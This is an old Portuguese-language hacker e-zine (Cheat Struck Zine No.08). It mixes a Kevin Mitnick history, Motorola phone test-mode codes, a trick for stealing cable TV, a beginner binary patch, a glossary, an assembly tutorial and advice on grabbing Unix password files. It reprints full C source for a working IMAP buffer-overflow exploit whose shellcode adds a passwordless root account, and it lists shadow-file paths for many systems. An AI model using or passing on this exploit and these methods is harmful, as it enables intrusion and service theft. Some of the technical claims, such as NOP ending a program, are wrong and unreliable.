CCCCCCCC SSSSSSSS ZZZZZZZZ CC SS ZZ CC SS ZZ CC SSSSSSSS ZZ CC SS ZZ CC SS ZZ CCCCCCCC SSSSSSSS ZZZZZZZZ CSZ - Cheat Struck Zine by Cheat Struck No.08 $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$ Indice $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Seção: Matéria: Assunto: Autor: Nota: 1. Introdução CSZ No.08 Cheat Struck --- 2. Kevin Mitnick História Markus Hübner 9,5 3. Phreaking Telefonia Cheat Struck 8,5 4. Tv à cabo Roubando tv à cabo Cheat Struck 9,5 5. Crackerz Primeiro crack Cheat Struck 10,0 6. Hacking para iniciantes Grossário de termos Cheat Struck 8,5 7. Programação Tutorial de ASSEMBLY Cheat Struck 9,0 8. Invasão de privacidade Pegando Shadown's Cheat Struck 9,5 9. Hack, the Art Pegando Shadown's(2) Cheat Struck 8,5 10. Preview na próxima edição... Cheat Struck --- $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$ 1. Introdução $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Cara! Como tem lamah por aí. Estes dias eu estava enviando via DCC o zine para todo mundo q pedisse. Aí venho um mané:¿Q zine é esse?¿Diz como pe- ga senhas de provedores?. Entendam o seguinte: Esse zine não tem como funda- mento ensinar a roubar senhas de provedores. Escrevi esse zine apenas para passar adiante o q eu sei sobre hacking. Você q é lamah de uma olhada na seção q fala sobre hacking, ela ex- plica detalhadamente tudo o que vc está fazendo e quem sabe assim vc invente seu próprio meio de invasão(assim como Mitnick) e fique conhecido. É +/- as- sim q inicia um hacker. Agora vc lamah q não está lêndo essa enchesão de saco FUCK OFF!!!! Ah! mudando completamente de assunto, A FRANÇA é Campeã do MUNDO!!!! ViVa La FrAnCe!¡!¡! Campeon du mundi!!! F.Bartez, L.Blanc, M.Dessaili, Thuram , Deschamps(c), Z.Zidane, Lizarazu, Djorkaeff, E.Petit, T.Henry e D.Trezeguet foram os maiores crakes da copa. E se vc ainda acha q a França é um timinho, então o Brasil não é um time, porq a França não é 2x melhor q o Brasil, ela é 3 vezes melhor q o Brasil(os fantoches da nike). $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$ 2. Kevin Mitnick $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ A História de Mitnick (parte 3) ... Por Markus Hübner ... Mitnick era agora uma vítima de seu própio ego. Era já procurado na California por casos anteriores de invasão de sistemas do Departamento de Veículos de Motor da California. Rendeu-se pacificamente aos agentes do FBI no meio da noite, Mitnick foi preso em 15 de Fevereiro de 1995. Seus computa- dores, software, livros, notas, e equipamento celular, foram tidos como evi- dência. Um modem celular foi usado para llamar um site da Sprint Celullar por canais inversos, estes são os canais normalmente reservados para as comunica- cões do fone à base. Mitnick então chamava a um provedor e re-fazia sua cha- mada ao Colorado daonde conectava-se a Internet. Isto tornava o rastreamento quase impossível mesmo aos melhores experts no campo. Na Internet, Mitnick podia então conectar-se a centenas de redes de computadores ao redor do mundo . Quando Shimomura e Mitnick se encontraram pela primera vez em uma sala do tribunal em Raleigh Carolina do Norte, Mitnick olhou Shimomura e dis- se "Olá Tsutomu, respeito tuas habilidades". Na quinta Conferência sobre Computadores, Liberdade e Privacidade, realizada em 28 de Março de 1995, em Burlingame, California, Kevin Mitnick foi o tema quente das discussões sobre segurança de redes de alto nivel. O diretor Carey Heckman comentou "Mitnick criou uma espécie de urgência Sputnick em segurança de dados." Comparando as ivasões de Mitnick, e a falta de melhor segurança, com a derrota dos Estados Unidos aos Russos na corrida espacial de 1958 com o satélite Sputnick. Uma vez chamado "Terrorista da Informática" por o Departamento de Justiça, Mitnick tem sido o tema de vários livros, artigos e filmes, incluin- do Jogos de Guerra e Johnny Mnemonic. Em 10 de Julho de 1995, Kevin Mitnick tinha que ser procesado por 23 acusações federais provadas acusando de crimes como fraude no sistema telefônico, fraude em informática e uso ilegal de com- ponentes de acesso telefonico para evitar tarifação. Já requerido por violar previamente sua liberdade condicional, as violacões de Mitnick incluian outros casos cubrindo seis jurisdições, e ganhando um maximo de 20 anos por cada um dos 23 casos. Em 31 de Março de 1996 começou a "digital hijack", uma grande acão na rede que pedia pela libertação de Kevin Mitnick. Agentes inte- ligentes de software inundaram os sites de busca... Esta campanha continuará até que Mitnick seja libertado..... $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$ 3. Phreaking $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Continuando a lista de comandos para a programação do testmode nos celulares motorola... 36***# Scan (telephones TDMA apenas). Mostra todos os canais acessados. Onde *** é a velocidade em milisegundos no qual estará passando os canais. 37# configura a bateria baixa. Use: #37#*# onde * é qquer numero de 1 a 255. Se vc colocar 1, o indicador da Bateria baixa irá subir até q o phone totalmente ligado. 38# Mostra o ESN (Mostra o ESN em 4 passos, 2 digitos em hexadecimal e 2 em decimal. ou 38# SND-SNM. Mostra AA BB. Onde AA=Endereço;BB=conteudo. O comando SND-SNM é parecido com o 18#(SEND NAM). 39# Compander ON ("D" Series Portateis) ou 39# RCVSU. Receber um vocabulo do controle de canais. Onde o vocabulo é re- cebido e mostrado em hex. A tecla # cancela o comando. 40# RCVVC. Receber um vocabulo do controle de vóz no canal. Onde o vocabulo é recebido e mostrado em hex. A tecla # cancela o comando. 41# Abilitar Diversidade (Somente nas series F19CTA...) 42# Disabilita Diversidade (Somente nas series F19CTA...) 43# Disabilita Diversidade USE T/R ANTENNA (Somente nas series F19CTA...) USE R ANTENNA (Somente nas series D.M.T./ Mini TAC) 44# Disabilita Diversidade USE R ANTENNA (Somente nas series F19CTA...) USE T/R ANTENNA (somente nas series D.M.T./ Mini TAC) 45# Mostra o Indicador do sinal remoto recebido (Mostra em 3 digitos de nu- meros decimais) 46# Mostra o tempo de chamada. 47*# Configura o nível do RX Audio. (Nas series F19CTA...) *=0, Lowest Volume *=6, Highest Volume *=7, mudo *=4, padrão (Nas series D.M.T./ Mini TAC) *=0, Lowest Volume *=7, Highest Volume *=4, padrão (nas series TDMA, F09F... e Higher Portateis) *=0, Lowest Volume *=15, Highest Volume *=2 a 4, padrão 48# Liga Side Tone. 49# Desliga Side Tone. 50# Dados de manuntenção são transmitidos e testa os resultados mostrados: PASS = dados recebidos estão corretos FAIL 1 = timeout de 2 segundos, sem gravar os dados. FAIL 2 = dados recebidos estão incorretos $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$ 4. TV à Cabo $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Já lí varios txts de violação de tv à cabo, em inglês e portugês. A maioria dos textos em português foram extraidos do Guia definido de roubar TV à cabo brasileira, escrito por AciDmuD. Mas aki vai uma manha q eu já conhecida antes de ser escrita nesse tutorial. Quem descobriu esse truque foi meu tio q é tri fuçador. Para fazer isso vc precisará de um derivador, 2 ou 3 cabos(akeles que ligam a tv com o video), e um video. Esse truque só foi testado e aprovado na tv a cabo NET mas deve funcionar em qquer outra tv por assinatura. Eu irei me referir a tv à cabo como net. O que você tem q fazer é pegar o derivador(Um desses tróço que tem uma entrada de cabo e umas três saidas) e ligar o cabo da net na sua entrada (onde está indicando IN). Nas saidas do derivador ligue os outros cabos. Ligue estes cabos na entrada UHF(IN) do seu video, ou se vc tem uma tv bem moderna, pode liga-la direto a ela. Depois finalmente ligue o video à televisão. Pronto agora ligue o video e ponha no VCR. Passe os canais pelo video e não pela tv. Algo importante de se comentar: Nos videos SONY esse truque funcionou bem, nos videos PNASONIC e PHILIPS deu uns problemas. No tutorial encontrado no AXUR05 dizia q mesmo que os carinhas da net bloquearem o seu aparelho se vc fizesse esse truque funcionaria mas eu ainda não testei. ¡LAMAH HELP! Para lamers, burros ou leigos aki vai um esqueminha que será utíl se vc não entendeu nada do q estava escrito acima. .--------. .--------. .-----. | | ====cabo=da=net======: derivador:====cabo=======| net |====| TV | '-"------' '-----' | | | '--------' | | } cabo | | | .---------. .-------. | | | video |====| TV | '-------' | | '---------' $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$ 5. Crackerz $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ YEAH!!! Está é a segunda edição em q estou publicando essa seção. Na edição passada vc viu a fonte de um prog em assembler q poderia ser compilado com o debug do dos. Se vc ainda não lêu a edição numero 08 não leia esta seção. Mas se vc lêu, please copie a fonte do assembler em uma folha só para entender melhor como funciona. Aki está a pequena parte q vc deve copiar: mov al, 6A int 10 mov ax, 4C00 int 21 Esse programa mudara a janela do dos para 800x600. Tá bom. Depois de ja ter compilado para modelo1.com, abra-o com um ed hexadecimal. Estará exatamente assim: BO 64 CD 10 B8 00 4C CD 21 Onde: BO 64 == mov al, 64 CD 10 == int 10 B8 00 4C == mov ax, 4C00 CD 21 == int 21 Entendeu +/- né? Se não entendeu, desista pois vc não vai ter futuro na zona CRACKER. Então o que nós devemos fazer??? Vamos mudar a estrutura do programa para q ao invés de colocar o tam.800x600 para 80x25. A interrupção para esse tam é 07. Então o programa ficaria assim: mov al, 07 int 10 mov ax, 4c00 int 21 Porém como o programa é "muito grande" para ser editado de novo vamos crackea-lo. Mudaremos então apenas o conteudo do BO(no hexadecimal). Ficaria assim: BO 64 CD 10 B8 00 4C CD 21 ; Antigo código BO 07 CD 10 B8 00 4C CD 21 ; Novo código ^^ Entendeu??? Agora grave o programa por cima do antigo e execute-o p/ ver a diferença. Atenção!! Você só notara a diferença se antes tiver executa- do o antigo código é claro. Não seja lamer. Na maioria dos Crackings vc irá mudar apenas o conteudo dos MOV. Não fique mexendo em tudo o q vc encontrar, só modifique o q vc sabe o que é. No começo parece dificil mas aos poucos vc vai pegar a pratica. Este provavelmente foi o seu primeiro crack, a não ser q você já en- tendia do assunto e leu isso só para avaliar o conteudo da revista. $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$ 6. Hacking para iniciantes $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Grossário de termos usados por hackers. ADMINISTRADORES : substantivo (Vêr ROOT) AIX : substantivo (ver S.O.) ANARCHY : verbo 1.Ações Anarquisticas 2.Criação de explossivos, fórmulas quimicas, disquetes bombas,... ARQUIVO DE PASSWORD : substantivo 1.Um arquivo de um sistema q guarda todas as suas contas de acesso. BACKDOOR : substantivo 1.Porta traseira 2.Mecanismo no software que permite entrar evitando o metodo normal. BOXES : substantivo 1.Aparelhos elétricos ou eletronicos usados para praticar boxing. BOXING : verbo 1.Uso de aparatos eletronicos ou elétricos(Boxes) para praticar o phreaking. BUG : substantivo 1.Defeito do software que permite q os hackers invadam sistemas alheios. CARDING : verbo 1.Uso ilegal de cartões de credito, ou seus numeros, pertencentes a outras pessoas. Se relaciona muito com o hacking, porque para conseguir numeros de cartões de creditos, uma das melhores maneiras é o hacking. CAVALOS DE TROYA : substantivo 1.Programa residente no sistema que pretendemos hackear e que nos facilita informação sobre o que acontece nele. 2.Um tipo de virus em forma de programa q engana o usuario do sistema. CRACKEADOR : substantivo 1.Programa utilizado para achar os password encriptados dos arquivos de pass- words. Bem, o que ele faz é usar uma wordlist e encryptar todas as palavras até q encontre uma que bata com o password. CRACKER : substantivo 1.Pessona que elimina as proteções lógicas e as vezes fisicas do software. 2.Hacker malvado. 3.Hacker que usa a força bruta, o metodos que danificam o sistema que hackea. CYBERPUNK : substantivo 1.É um tipo de ideologia ou de sub-cultura. Se baseia no culto à tecnologia, à ciencia, e ao ódio à qualquer forma de poder organizado. ENGENHARIA SOCIAL : verbo 1.Convencer a alguém, por diversos meios, para que nos facilite informação util para hackear, ou para fazer algo que nos beneficie. EXPLOIT : verbo 1.Metodo concreto de usar um bug para entrar em um sistema. FIREWALL : substantivo 1.Sistema avançado de segurança que impede a pessoas não autorisadas tenham acesso ao sistema. HACKER : substantivo 1.Pessoa que pratica hacking. 2.Pessoa muito hagil com os computadores. 3.Pirata informatico, em qualquer de seus significados. HACKING : verbo 1.Penetrar em sistemas alheios. 2.Qualquer ação encaminhada a conseguir ser o root; como a engenharia social, o trashing, etc... HP/UX : substantivo (vêr S.O) INTRANET : substantivo 1.Rede privada conectada a internet, mas geralmente isolada desta por um firewall. 2.Rede privada que usa os mesmos protocolos de comunicação que internet (TCP/IP) e que pode estar isolada ou conectada a internet. IRIX : substantivo (vêr S.O.) LOG : substantivo 1.Arquivo que grava um registro das suas atividades no sistema, armasena informação sobre o seu acesso no sistema. LOGAR : verbo 1.Gravar as atividades dos usuários conectados em um arquivo log. LOGIN : verbo 1.Procedimento de entrar en um sistema. LOGON : verbo (Vêr LOGIN) PATCHER : verbo 1.Modificação de um programa anterior, com a intenção de solucionar um bug, ou para crackea-lo. PHREAKING : verbo 1.Uso do telefone, ou das redes e serviços telefonicos, gratis ou com um custo menor do normal. Devido a o uso intensivo de telefones por parte dos hackers, é bastante normal que usen o phreaking. 2.Modificação ou intervenção das linhas telefonicas, com outros fios destin- tos a ligar gratis. PIRATA INFORMATICO : substantivo 1.Pessoa dedicada a copia e distribuição de software ilegal, tando software comercial crackeado, como shareware registrado, etc... 2.Pessoa que elimina as proteções do software. Mais conhecido como cracker. 3.Delinqüente informatico. PPP, TCP/IP, UDP : substantivos 1.Destintos protocolos de comunicação, que usan as grandes redes como a internet. ROOT : substantivo 1.Pessoa que se encarega do funcionamento de um sistema informatico, geral- mente tem o controle total sobre o sistema. 2.Usuário com User ID = 0 SCRIPT : substantivo 1.No unix seria o equivalente aos bat's do ms-dos, só que muito mais potentes e com mais opções. SNIFFER : substantivo 1.Programa encaregado de registrar a informação que circula pela rede. SNIFFING : verbo 1.Registrar as informações que circulam por uma rede. S.O. : substantivo 1.Sistema operacional que usam os grandes computadores. 2.Abreviação de Sistema Operacional SUNOS : substantivo (ver S.O.) SYSOP : Substantivo (Vêr ROOT) TRACEAR : verbo 1.Seguir pistas q o leve a uma informação ou a uma pessoa. TRASHING : verbo 1.Rabiscar algumas idéias q surgirem para encontrar algo que possa ser útil na hora de hackear. UNIX : substantivo (vêr S.O.) VMS : substantivo (vêr S.O.) WAR DIALER : substantivo 1.Programa que scaneia a linha telefonica em busca de modems. WAREZ : substantivo 1.Pirataria, intercambio de programas através do modem. Geralmente por inet. 2.Pirateria em geral. WORDLIST : substantivo 1.Dicionario 2.Lista de palavras para serem testadas na hora de descriptografar as senhas. ZAPPER : substantivo 1.Programa que se encarega de apagar os logs que foram deixados ao entrar no sistema. $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$ 7. Programação $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Devido a varias e varias reclamações sobre o tutorial de assembler, que tinha como objetivo ensinar apenas o básico de assembly, eu decidi refa- zer totalmente o tutorial. Dessa vez aprenderemos muito mais do que os comandos e algumas beste- iras. Aprenderemos para q serve cada conjunto, interrupções, e tudo mais que exista no universo assembly. Este é o tutorial 1 que será usado apenas para os progs feitos pelo debug. E servirá apenas como uma introdução a linguagem ASSEMBLY, por isso não pense em aprender muita coisa com isso. O único programa que usaremos será o Debug do MS-DOS. --------Tutorial de Assembly(1). Guia Definido. By Cheat Struck-------------- Indice. 1. Iniciando 1.1 Entrando... 1.2 Comandos basicos do Debug 2. Conseitos 2.1 Registradores 2.2 Uso dos colchetes []'s 3. Primeiros comandos 3.1 Comando MOV 3.2 Comando ADD 3.3 Comando NOP 4. Fazendo programas 4.1 Colocando a fonte 4.2 Indicando o tamanho do programa 4.3 Nomeando o programa 5. Carregando programas 5.1 Indique o nome do arquivo 5.2 Carregando 5.3 Dessasemblando ########## 1. Iniciando ########## ***** 1.1 Entrando... ***** Nesse tutorial, nós usaremos apenas o programa Debug do MS-DOS. Para entrar no Debug digite "debug" no prompt. O novo prompt será "-". ***** 1.2 Comandos basicos do Debug ***** ? = Help A = Assemblar, começar o código do programa R = Vêr o conteudo do registrador N = Nomear o programa(já em .com) W = Escrever o programa Q = Sair T = Executa o comandos passo a passo L = Carrega um arquivo já existente ########## 2. Conseitos ########## ***** 2.1 Registradores **** AX Registrador Acumulador BX Registrador Base CX Registrador Contador DX Registrador de Dados DS Registrador de Segmento de Dados ES Registrador de Segmento Extra SS Registrador de Segmento de Pilha CS Registrador de Segmento de Código BP Registrador Apontador da Base SI Registrador de Índice Fonte DI Registrador de Índice Destino SP Registrador Apontador de Pilha IP Registrador Apontador da Próxima Instrução Sendo que os registradores AX, BX, CX e DX são divididos em baixo e alto(low & high). Assim sendo, os 2 primeiros registros são os registradores altos e os 2 ultimos os baixos. Ex: AX = 0A02 Registrador AH = 0A Alto AL = 02 Baixo ***** 2.2 Uso dos colchetes[]'s ***** Quando aparecer algo como: add al,[170] Indica-nos que vamos trabalhar com o conteúdo da célula de memória de número 170, ou seja, com o valor contido no endereço 170 da memória e não com o valor 170. ########## 3. Primeiros comandos ########## ***** 3.1 Comando MOV ***** Função: move um conteudo para um registrador. Sintaxe: MOV REGISTRADOR, CONTEÚDO Exemplo: MOV AX, 0001 ; AX = 0001 MOV AH, 04 ; AX = 0401 MOV AL, 03 ; AX = 0403 ***** 3.2 Comando ADD ***** Função: soma dois registradores ou um registrador com um conteudo. Sintaxe: ADD REGISTRADOR, CONTEÚDO Exemplo: MOV AX, 0004 ; AX = 0004 ADD AX, 02 ; 0004(AX) + 02 = 0006(novo AX) MOV BX, 0001 ; BX = 0001 ADD AX, BX ; 0006(AX) + 0001(BX) = 0007(novo AX) ***** 3.3 Comando NOP ***** Função: Finaliza o programa. Sintaxe: NOP Exemplo: MOV AX, 0002 ; AX = 0002 MOV BX, 0004 ; BX = 0004 ADD AX, BX ; 0002(AX) + 0004(BX) = 0006(novo AX) NOP ; Encerra o programa. ########## 4. Fazendo programas ########## ***** 4.1 Colocando a fonte ***** Digite "a". O prompt mudará para XXXX:0100 onde XXXX pode ser qquer numero. Aí vc deve colocar a fonte do programa. Se colocar alguma coisa erra- da, aparecerá a msg "^ Erro" indicando o local onde está errado. Para encerrar a fonte apenas aperte sem digitar nada. ***** 4.2 Indicando o tamanho do programa ***** Note q a cada comando digitado você vai adiantando uma possição. Por exemplo: XXXX:0100 mov al, 6A XXXX:0102 int 10 XXXX:0105 mov al, 4C XXXX:0107 int 21 XXXX:0109 Viu que vc parou no XXXX:0109? Pois é... o tamanho do arquivo está escondido aí. Aonde? Veja: XXXX:0109 ^^--09 bytes Então o que vc deve fazer agora é registrar o tamanho do arquivo no Registrador CX. Para isso digite RCX no prompt "-". Você verá o conteudo do CX e logo após ":" aí digite o tamanho do file, no caso 09. ***** 4.3 Nomeando o programa ***** Utilize o comando N na seguinte sintaxe: - N Nome.com Onde "nome" é o nome do file. Ele sempre deve estár em .com. ***** 4.4 Gravando o programa ***** Utilize o comando W. Ele sempre tem que ser digitado depois de já ter indicado os bytes. ########## 5. Carregando Programas ########## ***** 5.1 Indique o nome do arquivo ***** Digite N + nome ***** 5.2 Carregando ***** Digite L ***** 5.3 Dessasemblando ***** Digite U Isso irá mostrar toda a fonte do programa. ----------------------------------------------------------------------------- $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$ 8. Invasão de privacidade $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Lembra daquela matéria na edição 06(??) que ensinava a pegar o file passwd dos sistemas que usavam shadow, por ftp??? Lembra?? Pois é, recebi um mundarel de criticas dizendo que isso não adiantava... E que também akelas contas não iriam funcionar mesmo. Pois vou provar o contrario, e tb ensinar a catar o shadow em SO's Linux(para o pessoal que insiste). Olhe o file passwd que vc pegou ele vai estar mais ou menos assim: root:x:0:1:0000-Admin(0000):/:/sbin/sh daemon:x:1:1:0000-Admin(0000):/: bin:x:2:2:0000-Admin(0000):/usr/bin: sys:x:3:3:0000-Admin(0000):/: adm:x:4:4:0000-Admin(0000):/var/adm: lp:x:71:8:0000-lp(0000):/usr/spool/lp:/sbin/sh smtp:x:0:0:mail daemon user:/: uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp: nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network Admin:/usr/net/nls: nobody:x:60001:60001:uid no body:/: noaccess:x:60002:60002:uid no access:/: ftp:x:30000:30000:Anonymous FTP:/export/home/ftp:/bin/false Nem esperimente usar a conta root, pois ela só servirá se o Sysop do sistema for muito lamah. Então verifique contas tipo: lp:x:71:8:0000-lp(0000):/usr/spool/lp:/sbin/sh Veja primeiro o login(lp), não é um dos logins padrões tipo root,bin, sys, ... depois de uma olhada no uid(71) tb não é um uid colocado em contas padrões, olhe tb que no espaço reservado para comentarios(0000-lp(0000), não é uma conta do sysop, que apareceria assim "0000-Admin(0000)". E por fim, de uma olhada se existe um shell(/sbin/sh). Já que nesta conta existe vc poderá usa-la legal. Porém o SO pode estar protegido por firewall, aí nem um passwd do ar- quivo iria funcionar, a não ser que vc desse um spoof no DNS e coloca-se um IP de algum usuário cadastrado. Outra coisa importante a corrigir é que na matéria da edição passada, que ensinava a hackear SO's WinNT, o truque só funciona com sistemas que tem o IIS(Internet Information Service) ou o NIS(Network Information Service) já instalados. Também teve uns cassos em que os diretórios do ftpserver não fun- cionaram no wwwserver, então descubra um diretório que esteja abilitado no wwwserver. O truque para pegar o shadow nos Linux's aki tb precisa que o sistema que será invadido tenha o NIS/IIS instalado. Eu iria explicar tudinho passo à passo desse meio, mas achei melhor e mais pratico colocar apenas a fonte de um programinha em c de Akylonius que automaticamente coloca um login root no passwd e no shadow. ----[ imap_daemon.c ]--------start----------------------------------Cut-Here- /* Name: imap daemon */ /* autor: Akylonius */ #include #include #include #include #include #include #include char *h_to_ip(char *hostname); char *h_to_ip(char *hostname) { struct hostent *h; struct sockaddr_in tmp; struct in_addr in; h = gethostbyname(hostname); if (h==NULL) { perror("Resolving the host. \n"); exit(-1); } memcpy((caddr_t)&tmp.sin_addr.s_addr, h->h_addr, h->h_length); memcpy(&in,&tmp.sin_addr.s_addr,4); return(inet_ntoa(in)); } void banner(void) { system("clear"); printf("\nIMAP Exploit for Linux.\n"); printf("\n\tAuthor: Akylonius (aky@galeb.etf.bg.ac.yu)\n"); printf(" Modifications: p1 (p1@el8.org)\n"); } main(int argc, char **argv) { int fd; struct sockaddr_in sckdaddr; char *hostname; char buf[4092]; int i=8; char realegg[] = "\xeb\x58\x5e" "\x31\xdb\x83\xc3\x08\x83\xc3\x02\x88\x5e\x26" "\x31\xdb\x83\xc3\x23\x83\xc3\x23\x88\x5e\xa8" "\x31\xdb\x83\xc3\x26\x83\xc3\x30\x88\x5e\xc2" "\x31\xc0\x88\x46\x0b\x89\xf3\x83\xc0\x05\x31" "\xc9\x83\xc1\x01\x31\xd2\xcd\x80\x89\xc3\x31" "\xc0\x83\xc0\x04\x31\xd2\x88\x56\x27\x89\xf1" "\x83\xc1\x0c\x83\xc2\x1b\xcd\x80\x31\xc0\x83" "\xc0\x06\xcd\x80\x31\xc0\x83\xc0\x01\xcd\x80" "iamaselfmodifyingmonsteryeahiam\xe8\x83\xff\xff\xff" "/etc/passwdxroot::0:0:r00t:/:/bin/bashx"; char *point = realegg; buf[0]='*'; buf[1]=' '; buf[2]='l'; buf[3]='o'; buf[4]='g'; buf[5]='i'; buf[6]='n'; buf[7]=' '; banner(); if (argc<2) { printf("\nUsage: %s \n\n", argv[0]); exit(-1); } hostname=argv[1]; while(i<1034-sizeof(realegg) -1) /* -sizeof(realegg)+1) */ buf[i++]=0x90; while(*point) buf[i++]=*(point++); buf[i++]=0x83; /* ebp */ buf[i++]=0xf3; buf[i++]=0xff; buf[i++]=0xbf; buf[i++]=0x88; /* ret adr */ buf[i++]=0xf8; buf[i++]=0xff; buf[i++]=0xbf; buf[i++]=' '; buf[i++]='b'; buf[i++]='a'; buf[i++]='h'; buf[i++]='\n'; buf[i++]=0x0; if ((fd=socket(AF_INET,SOCK_STREAM,0))<0) perror("Error opening the socket. \n"); sckdaddr.sin_port=htons(143); sckdaddr.sin_family=AF_INET; sckdaddr.sin_addr.s_addr=inet_addr(h_to_ip(hostname)); if (connect(fd,(struct sockaddr *) &sckdaddr, sizeof(sckdaddr)) < 0) perror("Error with connecting. \n"); printf("hmm: \n"); getchar(); write(fd,buf,strlen(buf)+1); printf("hmm: \n"); close(fd); } ----[ imap_daemon.c ]----------end----------------------------------Cut-Here- $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$ 9. Hack, the Art $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Tá bom! Antes que me venham as inumeras queixas de que não consegui- ram usar os truques acima porque o SO não tinha IIS/NIS instalado(que talvéz vc nem saiba como descobrir). Aki vai os locais dos shadows nos SO's mais usados em redes. ! AIX 3 = /etc/security/passwd ou /tcb/auth/files/ * A/UX 3.0 = /tcb/files/auth// * BSD4.3-Reno = /etc/master.passwd * ConvexOS 10 = /etc/shadpw * ConvexOS 11 = /etc/shadow * DG/UX = /etc/tcb/aa/user/ x EP/IX = /etc/shadow * HP-UX = /.secure/etc/passwd x IRIX 5 = /etc/shadow * Linux 1.1 = /etc/shadow * OSF/1 = //etc/passwd / SCO Unix = /tcb/auth/files/ ## SunOS4.1 = /etc/security/passwd.adjunct * SunOS 5.0 = /etc/shadow x System V Release 4.0 = /etc/shadow * System V Release 4.2 = /etc/security/database * Ultrix 4 = //etc/auth * UNICOS = /etc/udb Você pode encontrar esses files em muitos ftpservers dirigidos por lamahs. O simbolo colocado antes do nome é apenas para vc reconhecer o siste- ma que está, eles serão exibidos no lugar do password no file /etc/passwd. $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$ 10. Preview $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ Na próxima edição... * Phreaking 'Mais comandos para o TESTMODE dos motorolas; * Hacking para iniciantes 'Dicas para LINUX; * Programação '2o. tutorial de assembly(já pegue o TASM); * Bugz 'I don't know * ??? '??? $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$ FFFFFFFFFFFF IIII NNNN NNN FFFFFFFFFFFF IIII NNNNNN NNN FFFF NNN NNN NNN FFFF IIII NNN NNN NNN FFFFFFFFFFFF IIII NNN NNN NNN FFFFFFFFFFFF IIII NNN 